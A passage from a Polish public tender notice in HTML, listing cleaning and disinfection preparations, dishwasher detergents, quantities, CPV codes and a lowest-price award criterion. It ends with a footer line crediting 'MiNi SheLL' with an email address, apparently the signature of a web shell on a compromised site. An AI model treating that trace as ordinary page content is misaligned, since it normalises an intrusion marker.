3. Preparat myjący do rąk usuwający zabrudzenia organiczne i nieorganiczne oraz florę bakteryjną ze skóry rąk. Nie podrażniający skóry.  Opakowanie max. 15l. - Ilość 1600 litrów.
4. Alkaliczny środek do mycia i dezynfekcji maszyn, ścian oraz posadzek oraz wszelkich powierzchni produkcyjnych (aluminiowe, ocynkowane). Preparat zawierający inhibitory korozji, charakteryzujący się wysokim działaniem bakteriobójczym, grzybobójczym i wirusobójczym, nie zawierający aktywnego chloru. Opakowanie max. 15l. - Ilość 2300 litrów.
5. Zasadowy płyn do mycia w zmywarkach do przyrządów kuchennych, garnków, tac , zawierający aktywny chlor, usuwający resztki jedzenia wszelkiego typu, szczególnie przyschnięte osady z białka i skrobii. (możliwość stosowania w zmywarce WINTERHALTER GS 650) Opakowanie ok. 25l. - Ilość 400 litrów.
6. Kwaśny środek nabłyszczający do maszynowego i przemysłowego użycia (płukania) we wszystkich typach zmywarek. (możliwość stosowania w zmywarce WINTERHALTER GS 650) Opakowanie max. 15l. - Ilość 500 litrów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.40-0, 39.83.20.00-3, 39.82.20.00-0, 39.83.12.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com